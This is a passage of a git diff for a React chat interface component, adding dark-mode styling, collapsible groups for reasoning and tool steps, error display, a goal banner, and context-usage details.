                           <span>{compactingMessage || t('chat.compacting')}</span>
@@ -2402,17 +3138,17 @@ export default function SessionChat({
             {/* Standalone thinking indicator when no incomplete message exists */}
             {(isStreaming || sending) && !isCompacting && !(messages.length > 0 && messages[messages.length - 1].role === 'assistant' && !messages[messages.length - 1].finish) && (
               <div className={`group relative ${!compact ? 'w-full' : ''} flex`}>
-                <div className={`flex gap-2.5 ${getMessageGroupClassName({ compact, isUser: false, isEditing: false })}`}>
+                <div className={compact ? `flex gap-2.5 ${getMessageGroupClassName({ compact, isUser: false, isEditing: false })}` : 'flex w-full min-w-0'}>
                   <span
-                    className={`inline-flex items-center justify-center rounded-full bg-red-500 text-white font-bold shadow-sm ring-2 ring-white flex-shrink-0 ${
+                    className={`inline-flex items-center justify-center rounded-full bg-red-500 text-white font-bold shadow-sm ring-2 ring-white flex-shrink-0 dark:ring-zinc-950 ${
                       compact ? 'w-7 h-7 text-xs' : 'w-8 h-8 text-sm'
-                    }`}
+                    } ${compact ? '' : 'absolute -left-10 top-1'}`}
                   >
                     {formatAgentName(pendingAgentName).charAt(0).toUpperCase()}
                   </span>
                   <div className="flex flex-col items-start flex-1 min-w-0">
                     <div className={`flex items-center gap-2 ${compact ? 'h-7' : 'h-8'}`}>
-                      <span className="text-xs font-semibold text-zinc-700">{formatAgentName(pendingAgentName)}</span>
+                      <span className="text-xs font-semibold text-zinc-700 dark:text-zinc-300">{formatAgentName(pendingAgentName)}</span>
                     </div>
                     <div className="flex flex-col min-w-0 w-full">
                       <div className={getStandaloneThinkingBubbleClassName(compact)}>
@@ -2432,32 +3168,11 @@ export default function SessionChat({
           </div>
         )}
         <div ref={messagesEndRef} className="h-0 flex-shrink-0" />
-
-        {/* Conversation bottom slot: lives inside the scrollable conversation area. */}
-        {conversationBottomSlot && !hideInput && (
-          <div className="sticky bottom-0 z-10 -mx-1 mt-auto translate-y-4 pt-1 bg-gradient-to-t from-gray-50 via-gray-50/95 to-transparent">
-            <div className={`relative min-w-0 ${!compact ? 'w-[min(76%,64rem)] mx-auto pl-4 pr-8' : ''}`}>
-              {typeof conversationBottomSlot === 'function'
-                ? conversationBottomSlot({
-                  sendPrompt: (text) => { void handleComposerPrompt(text); },
-                  setInput: (text) => {
-                    setInput(text);
-                    requestAnimationFrame(() => textareaRef.current?.focus());
-                  },
-                  focusInput: () => textareaRef.current?.focus(),
-                  sending,
-                  streaming: isStreaming,
-                  sessionId,
-                })
-                : conversationBottomSlot}
-            </div>
-          </div>
-        )}
       </div>
 
       {/* Suggestions — shown before user sends any message */}
       {suggestions && suggestions.length > 0 && !hasUserMessage && !hideInput && (
-        <div className="flex-shrink-0 px-3 pt-2.5 pb-2 border-t border-gray-100 bg-white">
+        <div className="flex-shrink-0 px-3 pt-2.5 pb-2 border-t border-gray-100 bg-white dark:border-zinc-800 dark:bg-zinc-950">
           <div className="flex items-center gap-1.5 mb-2">
             <span className="text-xs font-medium text-gray-400">{t('chat.suggestions')}</span>
           </div>
@@ -2478,8 +3193,33 @@ export default function SessionChat({
 
       {/* Follow-up input */}
       {!hideInput && (
-        <div className={`flex-shrink-0 bg-white ${compact ? 'px-4 py-3' : 'py-4'}`}>
-          <div className={`relative min-w-0 ${!compact ? (fullWidth ? 'w-full px-5' : 'w-[min(76%,64rem)] mx-auto pr-8 pl-[58px]') : ''}`}>
+        <div className={`flex-shrink-0 bg-white ${compact ? 'px-4 py-3' : 'py-4'} dark:bg-zinc-950`}>
+          <div className={`relative min-w-0 ${!compact ? (fullWidth ? 'w-full px-5' : 'w-[min(76%,64rem)] mx-auto px-6') : ''}`}>
+            {conversationBottomSlot && (
+              <div className="mb-2 min-w-0">
+                {typeof conversationBottomSlot === 'function'
+                  ? conversationBottomSlot({
+                    sendPrompt: (text, options) => { void handleComposerPrompt(text, options); },
+                    setInput: (text) => {
+                      setInput(text);
+                      requestAnimationFrame(() => textareaRef.current?.focus());
+                    },
+                    focusInput: () => textareaRef.current?.focus(),
+                    sending,
+                    streaming: isStreaming,
+                    sessionId,
+                    hasMessages: messages.length > 0,
+                  })
+                  : conversationBottomSlot}
+              </div>
+            )}
+            {visibleGoalBanner && (
+              <GoalBanner
+                goal={visibleGoalBanner}
+                t={t}
+                onDismiss={handleDismissGoalBanner}
+              />
+            )}
             <QueuedPromptPanel
               items={queuedPrompts}
               expanded={queueExpanded}
@@ -2530,20 +3270,20 @@ export default function SessionChat({
               onDrop={handleComposerDrop}
               className={`rounded-2xl border transition-all ${
                 isCompacting
-                  ? 'border-amber-200 bg-amber-50/30'
+                  ? 'border-amber-200 bg-amber-50/30 dark:border-amber-500/35 dark:bg-amber-950/25'
                   : isDragOver
-                    ? 'border-sky-300 bg-sky-50/60 ring-4 ring-sky-100'
+                    ? 'border-sky-300 bg-sky-50/60 ring-4 ring-sky-100 dark:border-sky-500/50 dark:bg-sky-950/35 dark:ring-sky-500/10'
                     : isStreaming
-                      ? 'border-zinc-200 bg-zinc-50'
-                      : 'border-zinc-200 bg-zinc-50 hover:border-zinc-300 focus-within:border-zinc-300 focus-within:bg-white focus-within:ring-4 focus-within:ring-zinc-100'
+                      ? 'border-zinc-200 bg-zinc-50 dark:border-zinc-800 dark:bg-zinc-900/70'
+                      : 'border-zinc-200 bg-zinc-50 hover:border-zinc-300 focus-within:border-zinc-300 focus-within:bg-white focus-within:ring-4 focus-within:ring-zinc-100 dark:border-zinc-800 dark:bg-zinc-900/70 dark:hover:border-zinc-700 dark:focus-within:border-zinc-700 dark:focus-within:bg-zinc-900 dark:focus-within:ring-zinc-800/60'
               }`}
             >
                 {/* Node reference chip */}
                 {nodeRef && (
                   <div className="flex items-center gap-1.5 px-3 pt-2.5 pb-1">
                     <span className="w-1.5 h-1.5 rounded-full bg-slate-400 flex-shrink-0" />
-                    <code className="text-[11px] font-mono font-semibold text-slate-700 truncate flex-1">{nodeRef.id}</code>
-                    <span className="text-[10px] text-slate-400 flex-shrink-0">{nodeRef.type}</span>
+                    <code className="text-[11px] font-mono font-semibold text-slate-700 truncate flex-1 dark:text-slate-200">{nodeRef.id}</code>
+                    <span className="text-[10px] text-slate-400 flex-shrink-0 dark:text-slate-500">{nodeRef.type}</span>
                     {onNodeRefDismiss && (
                       <button
                         onClick={onNodeRefDismiss}
@@ -2570,7 +3310,7 @@ export default function SessionChat({
                           <div
                             key={attachment.id}
                             className={`relative flex-shrink-0 rounded-lg border overflow-hidden ${
-                              isUploading ? 'border-sky-200 bg-sky-50' : 'border-gray-200 bg-gray-50'
+                              isUploading ? 'border-sky-200 bg-sky-50 dark:border-sky-500/35 dark:bg-sky-950/30' : 'border-gray-200 bg-gray-50 dark:border-zinc-800 dark:bg-zinc-900'
                             }`}
                           >
                             {isUploading ? (
@@ -2608,7 +3348,7 @@ export default function SessionChat({
                               ? 'border-red-200 bg-red-50 text-red-700'
                               : isUploading
                                 ? 'border-sky-200 bg-sky-50 text-sky-700'
-                                : 'border-gray-200 bg-gray-50 text-gray-700'
+                                : 'border-gray-200 bg-gray-50 text-gray-700 dark:border-zinc-800 dark:bg-zinc-900 dark:text-zinc-200'
                           }`}
                         >
                           {isUploading ? (
@@ -2698,8 +3438,8 @@ export default function SessionChat({
                             ? t('chat.placeholderNodeRef', { nodeId: nodeRef.id })
                             : effectivePlaceholder
                     }
-                    className={`w-full resize-none outline-none bg-transparent text-sm placeholder-zinc-400 ${
-                      sending ? 'text-zinc-400 cursor-not-allowed' : 'text-zinc-900'
+                    className={`w-full resize-none outline-none bg-transparent text-sm placeholder-zinc-400 dark:placeholder-zinc-600 ${
+                      sending ? 'text-zinc-400 cursor-not-allowed dark:text-zinc-500' : 'text-zinc-900 dark:text-zinc-100'
                     }`}
                     style={{
                       minHeight: `${effectiveComposerTextareaMinHeight}px`,
@@ -2722,7 +3462,7 @@ export default function SessionChat({
                     <Paperclip className="h-4 w-4" />
                   </button>
 
-                  <div className="mx-1 h-4 w-px shrink-0 bg-zinc-200" />
+                  <div className="mx-1 h-4 w-px shrink-0 bg-zinc-200 dark:bg-zinc-800" />
 
                   {toolbarSlot}
 
@@ -2734,10 +3474,13 @@ export default function SessionChat({
 
                   <div className="flex-1" />
 
-                  {contextWindowTokens && contextWindowTokens > 0 && (
+                  {resolvedContextWindowTokens > 0 && (
                     <ContextUsageRing
                       percent={contextUsagePercent}
                       title={contextUsageTitle}
+                      usedTokens={estimatedContextTokens}
+                      totalTokens={resolvedContextWindowTokens}
+                      breakdown={contextUsageBreakdown}
                     />
                   )}
 
@@ -2768,7 +3511,7 @@ export default function SessionChat({
                       className={`inline-flex h-8 w-8 items-center justify-center rounded-full transition-all ${
                         canSend
                           ? 'bg-sky-500 text-white hover:bg-sky-600 shadow-sm hover:shadow'
-                          : 'bg-zinc-200 text-zinc-400 cursor-not-allowed'
+                          : 'cursor-not-allowed border border-zinc-300 bg-zinc-200 text-zinc-400 dark:border-[#5a6573] dark:bg-[#46515e] dark:text-[#b8c2cc]'
                       }`}
                     >
                       {sending || hasUploadingFiles ? <Loader2 className="w-4 h-4 animate-spin" /> : <ArrowUp className="w-4 h-4" strokeWidth={2.5} />}
@@ -2815,10 +3558,10 @@ function AgentMentionDropdown({
 
   return (
     <div
-      className="absolute bottom-full left-0 right-0 mb-1 z-50 overflow-hidden rounded-lg border border-gray-200 bg-white shadow-lg"
+      className="absolute bottom-full left-0 right-0 z-50 mb-1 overflow-hidden rounded-lg border border-gray-200 bg-white shadow-lg dark:border-zinc-800 dark:bg-zinc-900 dark:shadow-xl dark:shadow-black/30"
       onMouseDown={(e) => e.preventDefault()}
     >
-      <div className="border-b border-gray-100 bg-gray-50 px-3 py-1.5 text-[10px] font-semibold uppercase tracking-wide text-gray-400">
+      <div className="border-b border-gray-100 bg-gray-50 px-3 py-1.5 text-[10px] font-semibold uppercase tracking-wide text-gray-400 dark:border-zinc-800 dark:bg-zinc-950 dark:text-zinc-500">
         {t('chat.mention.title')}
       </div>
       <div ref={listRef} className="max-h-64 overflow-y-auto p-1">
@@ -2831,17 +3574,17 @@ function AgentMentionDropdown({
               onClick={() => onSelect(agent)}
               onMouseDown={(e) => e.preventDefault()}
               className={`flex w-full min-w-0 items-center gap-2 rounded-md px-2 py-1.5 text-left transition-colors ${
-                idx === selectedIndex ? 'bg-sky-50 text-sky-800' : 'text-gray-800 hover:bg-gray-50'
+                idx === selectedIndex ? 'bg-sky-50 text-sky-800 dark:bg-sky-950/45 dark:text-sky-100' : 'text-gray-800 hover:bg-gray-50 dark:text-zinc-200 dark:hover:bg-zinc-800'
               }`}
             >
-              <Bot className="h-3.5 w-3.5 shrink-0 text-gray-400" />
+              <Bot className="h-3.5 w-3.5 shrink-0 text-gray-400 dark:text-zinc-500" />
               <span className="shrink-0 font-mono text-sm font-semibold">@{agent.name}</span>
-              <span className="min-w-0 truncate text-xs text-gray-500">{desc}</span>
+              <span className="min-w-0 truncate text-xs text-gray-500 dark:text-zinc-400">{desc}</span>
             </button>
           );
         })}
       </div>
-      <div className="flex gap-3 border-t border-gray-100 bg-gray-50 px-3 py-1 text-[10px] text-gray-400">
+      <div className="flex gap-3 border-t border-gray-100 bg-gray-50 px-3 py-1 text-[10px] text-gray-400 dark:border-zinc-800 dark:bg-zinc-950 dark:text-zinc-500">
         <span><kbd className="font-mono">↑↓</kbd> {t('chat.mention.navigate')}</span>
         <span><kbd className="font-mono">Enter</kbd>/<kbd className="font-mono">Tab</kbd> {t('chat.mention.select')}</span>
       </div>
@@ -2861,6 +3604,8 @@ export interface ChatMessageBubbleProps {
   onQuestionReject?: (callID: string, requestId: string) => Promise<void>;
   showActions?: boolean;
   showTimestamp?: boolean;
+  collapseIntermediateSteps?: boolean;
+  processGroupsDefaultOpen?: boolean;
   compact?: boolean;
   onCopy?: (text: string) => void;
   editingMessageId?: string | null;
@@ -2873,8 +3618,32 @@ export interface ChatMessageBubbleProps {
   onEditSave?: () => Promise<void>;
   onEditSend?: () => Promise<void>;
   onRegenerate?: (messageId: string) => Promise<void>;
-  /** Compacted messages that precede this summary message */
-  compactedMessages?: MergedMessage[];
+}
+
+function ProcessGroupDetails({
+  defaultOpen,
+  children,
+}: {
+  defaultOpen: boolean;
+  children: React.ReactNode;
+}) {
+  const detailsRef = useRef<HTMLDetailsElement>(null);
+
+  useLayoutEffect(() => {
+    if (detailsRef.current) {
+      detailsRef.current.open = defaultOpen;
+    }
+  }, [defaultOpen]);
+
+  return (
+    <details
+      ref={detailsRef}
+      data-testid="chat-process-group"
+      className="group/process mt-2 first:mt-0 overflow-hidden rounded-lg border border-zinc-200/90 bg-white/80 shadow-none"
+    >
+      {children}
+    </details>
+  );
 }
 
 function ChatMessageBubbleInner({
@@ -2885,6 +3654,8 @@ function ChatMessageBubbleInner({
   onQuestionReject,
   showActions = false,
   showTimestamp = false,
+  collapseIntermediateSteps = false,
+  processGroupsDefaultOpen = false,
   compact = true,
   onCopy,
   editingMessageId,
@@ -2897,7 +3668,6 @@ function ChatMessageBubbleInner({
   onEditSave,
   onEditSend,
   onRegenerate,
-  compactedMessages,
 }: ChatMessageBubbleProps) {
   const { t } = useTranslation('session');
   const isUser = message.role === 'user';
@@ -2909,33 +3679,13 @@ function ChatMessageBubbleInner({
   // instead — same UX, no popup blocker / data-URL restriction headaches.
   const [previewImage, setPreviewImage] = useState<{ url: string; alt?: string } | null>(null);
   if (message.finish === 'summary') {
-    const hasArchived = compactedMessages && compactedMessages.length > 0;
     return (
-      <div className="my-3 px-1">
-        {/* Archived messages shown inline without collapse */}
-        {hasArchived && (
-          <div className="mb-3 space-y-3">
-            {compactedMessages!.map((cMsg) => (
-              <ChatMessageBubble
-                key={cMsg.id}
-                message={cMsg}
-                showTimestamp={showTimestamp}
-                compact={compact}
-                onCopy={onCopy}
-                editingMessageId={editingMessageId}
-                editingText={editingText}
-                actionsDisabled={actionsDisabled}
-                actionMessageId={actionMessageId}
-                onEditStart={onEditStart}
-                onEditChange={onEditChange}
-                onEditCancel={onEditCancel}
-                onEditSave={onEditSave}
-                onEditSend={onEditSend}
-                onRegenerate={onRegenerate}
-              />
-            ))}
-          </div>
-        )}
+      <div className={getCompactionDividerClassName(compact)}>
+        <span className="h-px flex-1 bg-zinc-200" />
+        <span className="shrink-0 px-1.5 font-medium text-zinc-500">
+          {t('chat.contextCompressed')}
+        </span>
+        <span className="h-px flex-1 bg-zinc-200" />
       </div>
     );
   }
@@ -2957,22 +3707,28 @@ function ChatMessageBubbleInner({
   const editableRawText = latestEditablePart?.text || '';
   const isEditing = !!targetPartId && editingMessageId === targetMessageId;
   const isActionPending = actionMessageId === targetMessageId;
+  const instructionDisplayLabel = isUser && !isEditing && editableTextParts.length === 1
+    ? parseInstructionDisplayText(getMessagePartDisplayText(editableTextParts[0]))
+    : null;
 
-  const bubbleClass = getMessageBubbleClassName({ compact, isUser, isEditing });
+  const bubbleClass = instructionDisplayLabel
+    ? getInstructionDisplayBubbleClassName(compact)
+    : getMessageBubbleClassName({ compact, isUser, isEditing });
   const messageGroupClass = getMessageGroupClassName({ compact, isUser, isEditing });
   const actionBarClass = `flex items-center gap-1.5`;
   const editingActionBarClass = getEditingActionBarClassName();
-  const iconButtonClass = 'group/action relative inline-flex h-6 w-6 items-center justify-center rounded-full border border-gray-200/80 bg-white/80 text-gray-400 transition-colors duration-150 hover:border-gray-300 hover:text-gray-700 disabled:opacity-40 disabled:cursor-not-allowed';
+  const iconButtonClass = 'group/action relative inline-flex h-6 w-6 items-center justify-center rounded-full border border-gray-200/80 bg-white/80 text-gray-400 transition-colors duration-150 hover:border-gray-300 hover:text-gray-700 disabled:opacity-40 disabled:cursor-not-allowed dark:border-zinc-800 dark:bg-zinc-900/80 dark:text-zinc-500 dark:hover:border-zinc-700 dark:hover:text-zinc-200';
   const tooltipClass = 'pointer-events-none absolute bottom-full left-1/2 z-10 mb-1.5 -translate-x-1/2 whitespace-nowrap rounded-md bg-gray-900 px-2 py-1 text-[11px] font-medium text-white opacity-0 shadow-sm transition-opacity duration-150 group-hover/action:opacity-100';
+  const messageErrorText = isUser ? '' : getMessageErrorText(message);
 
   const avatarSize = compact ? 'w-7 h-7 text-xs' : 'w-8 h-8 text-sm';
 
   const avatar = isUser ? (
-    <span className={`inline-flex items-center justify-center rounded-full bg-gradient-to-b from-sky-400 to-blue-500 text-white shadow-sm ring-2 ring-white flex-shrink-0 ${avatarSize}`}>
+    <span className={`inline-flex items-center justify-center rounded-full bg-gradient-to-b from-sky-400 to-blue-500 text-white shadow-sm ring-2 ring-white flex-shrink-0 dark:ring-zinc-950 ${avatarSize}`}>
       <User className={compact ? 'w-3 h-3' : 'w-3.5 h-3.5'} />
     </span>
   ) : (
-    <span className={`inline-flex items-center justify-center rounded-full bg-red-500 text-white font-bold shadow-sm ring-2 ring-white flex-shrink-0 ${avatarSize}`}>
+    <span className={`inline-flex items-center justify-center rounded-full bg-red-500 text-white font-bold shadow-sm ring-2 ring-white flex-shrink-0 dark:ring-zinc-950 ${avatarSize}`}>
       {agentName.charAt(0).toUpperCase()}
     </span>
   );
@@ -2989,11 +3745,18 @@ function ChatMessageBubbleInner({
             {t('chat.sending')}
           </div>
         ) : (
-          <div className="flex items-center gap-1 py-1" aria-label={t('chat.thinking')}>
-            <span className="w-1.5 h-1.5 rounded-full bg-zinc-400 animate-bounce [animation-delay:-0.3s]" />
-            <span className="w-1.5 h-1.5 rounded-full bg-zinc-400 animate-bounce [animation-delay:-0.15s]" />
-            <span className="w-1.5 h-1.5 rounded-full bg-zinc-400 animate-bounce" />
-          </div>
+          messageErrorText ? (
+            <div className="flex items-start gap-2 py-1 text-sm text-red-700" role="alert">
+              <AlertCircle className="mt-0.5 h-4 w-4 flex-shrink-0 text-red-500" />
+              <span className="whitespace-pre-wrap break-words">{messageErrorText}</span>
+            </div>
+          ) : (
+            <div className="flex items-center gap-1 py-1" aria-label={t('chat.thinking')}>
+              <span className="w-1.5 h-1.5 rounded-full bg-zinc-400 animate-bounce [animation-delay:-0.3s]" />
+              <span className="w-1.5 h-1.5 rounded-full bg-zinc-400 animate-bounce [animation-delay:-0.15s]" />
+              <span className="w-1.5 h-1.5 rounded-full bg-zinc-400 animate-bounce" />
+            </div>
+          )
         )
       )}
 
@@ -3014,6 +3777,186 @@ function ChatMessageBubbleInner({
           // UX for "look at this image and …" style messages.
           const fileParts = parts.filter((p) => p.type === 'file' && p.url);
           const displayParts = parts.filter((p) => !(p.type === 'file' && p.url));
+          const isBlockingQuestionToolPart = (part: MessagePart): boolean => {
+            if (part.type !== 'tool') return false;
+            if (part.callID && pendingQuestions?.[part.callID]) return true;
+            const toolName = (part.tool || '').toLowerCase();
+            return toolName === 'question' || toolName === 'request_user_input' || toolName.includes('question');
+          };
+          const isIntermediateProcessPart = (part: MessagePart): boolean => {
+            if (part.type === 'reasoning' || part.type === 'thinking') {
+              return !!getRenderableThinkingText(part);
+            }
+            return part.type === 'tool' && !isBlockingQuestionToolPart(part);
+          };
+          const isRenderableDisplayPart = (part: MessagePart): boolean => {
+            if (isIntermediateProcessPart(part)) return true;
+            if (part.type === 'text') return !!getMessagePartDisplayText(part).trim();
+            if (part.type === 'tool') return true;
+            if (part.type === 'file') return !!part.url;
+            return false;
+          };
+          const renderPart = (part: MessagePart, i: number) => (
+            // Spacing between consecutive parts is owned by this wrapper,
+            // not by individual part components. Each part used to set its
+            // own `mt-2 first:mt-0`, but since every part lives in its own
+            // wrapper div, `first:` always matched and the gap collapsed
+            // to zero between, e.g., a tool card and the next thinking
+            // block, making them look glued together.
+            <div key={part.id || i} className="mt-2 first:mt-0">
+              {/* Text */}
+              {part.type === 'text' && (() => {
+                const rawText = part.text || '';
+                const nodeRefMatch = isUser
+                  ? rawText.match(/^@@node:([^|\n]+)\|([^\n]+)\n([\s\S]*)$/)
+                  : null;
+                const partDisplayText = getMessagePartDisplayText(part);
+                if (!partDisplayText.trim()) return null;
+                const displayText = nodeRefMatch && partDisplayText === rawText ? nodeRefMatch[3] : partDisplayText;
+                const instructionLabel = isUser ? parseInstructionDisplayText(displayText) : null;
+                if (instructionLabel) {
+                  return (
+                    <span className="inline-flex max-w-full items-center truncate text-sm font-semibold leading-none text-rose-700">
+                      {instructionLabel}
+                    </span>
+                  );
+                }
+                return (
+                  <>
+                    {nodeRefMatch && (
+                      <div className="flex items-center gap-1.5 mb-2 bg-gray-100 border border-gray-200 rounded-md px-2 py-1">
+                        <span className="w-1.5 h-1.5 rounded-full bg-gray-400 flex-shrink-0" />
+                        <code className="text-[10px] font-mono font-semibold text-gray-700 truncate">{nodeRefMatch[1]}</code>
+                        <span className="text-[9px] text-gray-500 flex-shrink-0">{nodeRefMatch[2]}</span>
+                      </div>
+                    )}
+                    <StreamingMarkdown
+                      content={displayText}
+                      isStreaming={isActive && !isUser}
+                    />
+                  </>
+                );
+              })()}
+
+              {/* Tool call */}
+              {part.type === 'tool' && (
+                <ChatToolPart
+                  part={part}
+                  pendingQuestion={part.callID ? pendingQuestions?.[part.callID] : undefined}
+                  onAnswer={onQuestionAnswer && part.callID
+                    ? (answers) => onQuestionAnswer(part.callID!, pendingQuestions![part.callID!].requestId, answers)
+                    : undefined}
+                  onReject={onQuestionReject && part.callID
+                    ? () => onQuestionReject(part.callID!, pendingQuestions![part.callID!].requestId)
+                    : undefined}
+                />
+              )}
+
+              {/* Reasoning / thinking */}
+              {(part.type === 'reasoning' || part.type === 'thinking') && (() => {
+                const thinkingText = getRenderableThinkingText(part);
+                if (!thinkingText) return null;
+                const partKey = part.id || `reasoning-${i}`;
+                const isExpanded = getPartExpanded(partKey);
+                const isThinking = !isReasoningDone;
+                return (
+                  // Vertical spacing is provided by the parent part wrapper
+                  // (see `otherParts.map` above); keep this container neutral
+                  // so wrapper-level `mt-2 first:mt-0` is the single source of
+                  // truth for inter-part gaps.
+                  <div>
+                    <button
+                      onClick={() => togglePart(partKey)}
+                      disabled={isThinking}
+                      className="group/think w-full text-left"
+                    >
+                      <div className={`flex items-center gap-2 px-2.5 py-1.5 rounded-md border text-xs transition-colors ${
+                        isThinking
+                          ? 'bg-sky-50 border-sky-100'
+                          : 'bg-zinc-50 border-zinc-200 hover:bg-zinc-100'
+                      }`}>
+                        {isThinking ? (
+                          <>
+                            <Brain className="w-3.5 h-3.5 flex-shrink-0 text-violet-500" />
+                            <span className="text-violet-600">{t('chat.thinking')}</span>
+                          </>
+                        ) : (
+                          <>
+                            <Brain className="w-3.5 h-3.5 flex-shrink-0 text-violet-500" />
+                            <span className="text-zinc-500 truncate min-w-0">
+                              {thinkingText.slice(0, 80)}{thinkingText.length > 80 ? '…' : ''}
+                            </span>
+                            <ChevronDown className={`w-3 h-3 ml-auto text-zinc-400 flex-shrink-0 transition-transform ${isExpanded ? '' : '-rotate-90'}`} />
+                          </>
+                        )}
+                      </div>
+                    </button>
+                    {isExpanded && (
+                      <div className="mt-1 px-2.5 py-2 bg-zinc-50 rounded-md border border-zinc-200 text-[11px] text-zinc-500 whitespace-pre-wrap font-mono leading-relaxed max-h-52 overflow-y-auto">
+                        {thinkingText}
+                      </div>
+                    )}
+                  </div>
+                );
+              })()}
+            </div>
+          );
+          const renderProcessGroup = (group: Array<{ part: MessagePart; index: number }>, groupIndex: number) => {
+            const reasoningCount = group.filter(({ part }) => part.type === 'reasoning' || part.type === 'thinking').length;
+            const toolCount = group.filter(({ part }) => part.type === 'tool').length;
+            const summary = [
+              reasoningCount > 0 ? t('chat.process.reasoningCount', { count: reasoningCount }) : '',
+              toolCount > 0 ? t('chat.process.toolCount', { count: toolCount }) : '',
+            ].filter(Boolean).join(' · ');
+            const groupKey = group.map(({ part, index }) => part.id || index).join('-');
+            return (
+              <ProcessGroupDetails
+                key={`process-${groupIndex}-${groupKey}`}
+                defaultOpen={processGroupsDefaultOpen}
+              >
+                <summary className="flex cursor-pointer list-none items-center gap-2 px-2.5 py-2 text-xs text-zinc-600 transition-colors hover:bg-zinc-50">
+                  <ListTree className="h-3.5 w-3.5 flex-shrink-0 text-zinc-400" />
+                  <span className="flex-shrink-0 font-semibold text-zinc-700">
+                    {t('chat.process.title', { count: group.length })}
+                  </span>
+                  {summary && (
+                    <span className="min-w-0 truncate text-zinc-500">
+                      {summary}
+                    </span>
+                  )}
+                  <ChevronDown className="ml-auto h-3 w-3 flex-shrink-0 text-zinc-400 transition-transform group-open/process:rotate-180" />
+                </summary>
+                <div className="border-t border-zinc-200/70 px-2.5 py-2">
+                  {group.map(({ part, index }) => renderPart(part, index))}
+                </div>
+              </ProcessGroupDetails>
+            );
+          };
+          const renderDisplayParts = () => {
+            if (!collapseIntermediateSteps || isUser) {
+              return displayParts.map(renderPart);
+            }
+            const nodes: React.ReactNode[] = [];
+            let processGroup: Array<{ part: MessagePart; index: number }> = [];
+            let processGroupIndex = 0;
+            const flushProcessGroup = () => {
+              if (processGroup.length === 0) return;
+              nodes.push(renderProcessGroup(processGroup, processGroupIndex));
+              processGroup = [];
+              processGroupIndex += 1;
+            };
+            displayParts.forEach((part, index) => {
+              if (isIntermediateProcessPart(part)) {
+                processGroup.push({ part, index });
+                return;
+              }
+              if (!isRenderableDisplayPart(part)) return;
+              flushProcessGroup();
+              nodes.push(renderPart(part, index));
+            });
+            flushProcessGroup();
+            return nodes;
+          };
           return (
             <>
               {fileParts.length > 0 && (
@@ -3041,104 +3984,12 @@ function ChatMessageBubbleInner({
                         <span className="truncate max-w-[240px]">{part.filename || 'file'}</span>
                       </div>
                     );
-                  })}
-                </div>
-              )}
-              {displayParts.map((part: MessagePart, i: number) => (
-                // Spacing between consecutive parts is owned by this wrapper,
-                // not by individual part components. Each part used to set its
-                // own `mt-2 first:mt-0`, but since every part lives in its own
-                // wrapper div, `first:` always matched and the gap collapsed
-                // to zero between, e.g., a tool card and the next thinking
-                // block, making them look glued together.
-                <div key={part.id || i} className="mt-2 first:mt-0">
-                  {/* Text */}
-                  {part.type === 'text' && part.text && (() => {
-                    const nodeRefMatch = isUser
-                      ? part.text.match(/^@@node:([^|\n]+)\|([^\n]+)\n([\s\S]*)$/)
-                      : null;
-                    const displayText = nodeRefMatch ? nodeRefMatch[3] : part.text;
-                    return (
-                      <>
-                        {nodeRefMatch && (
-                          <div className="flex items-center gap-1.5 mb-2 bg-gray-100 border border-gray-200 rounded-md px-2 py-1">
-                            <span className="w-1.5 h-1.5 rounded-full bg-gray-400 flex-shrink-0" />
-                            <code className="text-[10px] font-mono font-semibold text-gray-700 truncate">{nodeRefMatch[1]}</code>
-                            <span className="text-[9px] text-gray-500 flex-shrink-0">{nodeRefMatch[2]}</span>
-                          </div>
-                        )}
-                        <StreamingMarkdown
-                          content={displayText}
-                          isStreaming={isActive && !isUser}
-                        />
-                      </>
-                    );
-                  })()}
-
-                  {/* Tool call */}
-                  {part.type === 'tool' && (
-                    <ChatToolPart
-                      part={part}
-                      pendingQuestion={part.callID ? pendingQuestions?.[part.callID] : undefined}
-                      onAnswer={onQuestionAnswer && part.callID
-                        ? (answers) => onQuestionAnswer(part.callID!, pendingQuestions![part.callID!].requestId, answers)
-                        : undefined}
-                      onReject={onQuestionReject && part.callID
-                        ? () => onQuestionReject(part.callID!, pendingQuestions![part.callID!].requestId)
-                        : undefined}
-                    />
-                  )}
-
-                  {/* Reasoning / thinking */}
-                  {(part.type === 'reasoning' || part.type === 'thinking') && (part.text || part.thinking) && (() => {
-                    const thinkingText = part.text || part.thinking || '';
-                    const partKey = part.id || `reasoning-${i}`;
-                    const isExpanded = getPartExpanded(partKey);
-                    const isThinking = !isReasoningDone;
-                    return (
-                      // Vertical spacing is provided by the parent part wrapper
-                      // (see `otherParts.map` above); keep this container neutral
-                      // so wrapper-level `mt-2 first:mt-0` is the single source of
-                      // truth for inter-part gaps.
-                      <div>
-                        <button
-                          onClick={() => togglePart(partKey)}
-                          disabled={isThinking}
-                          className="group/think w-full text-left"
-                        >
-                          <div className={`flex items-center gap-2 px-2.5 py-1.5 rounded-md border text-xs transition-colors ${
-                            isThinking
-                              ? 'bg-sky-50 border-sky-100'
-                              : 'bg-zinc-50 border-zinc-200 hover:bg-zinc-100'
-                          }`}>
-                            {isThinking ? (
-                              <>
-                                <Brain className="w-3.5 h-3.5 flex-shrink-0 text-violet-500" />
-                                <span className="text-violet-600">{t('chat.thinking')}</span>
-                              </>
-                            ) : (
-                              <>
-                                <Brain className="w-3.5 h-3.5 flex-shrink-0 text-violet-500" />
-                                <span className="text-zinc-500 truncate min-w-0">
-                                  {thinkingText.slice(0, 80)}{thinkingText.length > 80 ? '…' : ''}
-                                </span>
-                                <ChevronDown className={`w-3 h-3 ml-auto text-zinc-400 flex-shrink-0 transition-transform ${isExpanded ? '' : '-rotate-90'}`} />
-                              </>
-                            )}
-                          </div>
-                        </button>
-                        {isExpanded && (
-                          <div className="mt-1 px-2.5 py-2 bg-zinc-50 rounded-md border border-zinc-200 text-[11px] text-zinc-500 whitespace-pre-wrap font-mono leading-relaxed max-h-52 overflow-y-auto">
-                            {thinkingText}
-                          </div>
-                        )}
-                      </div>
-                    );
-                  })()}
-                </div>
-              ))}
-            </>
-          );
+                    })}
+                  </div>
+                )}
+                {renderDisplayParts()}
+              </>
+            );
         })()
       )}
 
@@ -3256,14 +4107,62 @@ function ChatMessageBubbleInner({
   ) : null;
 
   if (isUser) {
+    if (!compact) {
+      return (
+        <div className="group relative flex w-full min-w-0 justify-end">
+          <div className={`flex min-w-0 flex-col items-end ${isEditing ? 'w-full' : 'max-w-[88%]'}`}>
+            {bubble}
+            {footer}
+          </div>
+          <div className="absolute -right-10 top-1">
+            {avatar}
+          </div>
+          {previewImage && (
+            <ImageLightbox
+              src={previewImage.url}
+              alt={previewImage.alt}
+              onClose={() => setPreviewImage(null)}
+            />
+          )}
+        </div>
+      );
+    }
+
     return (
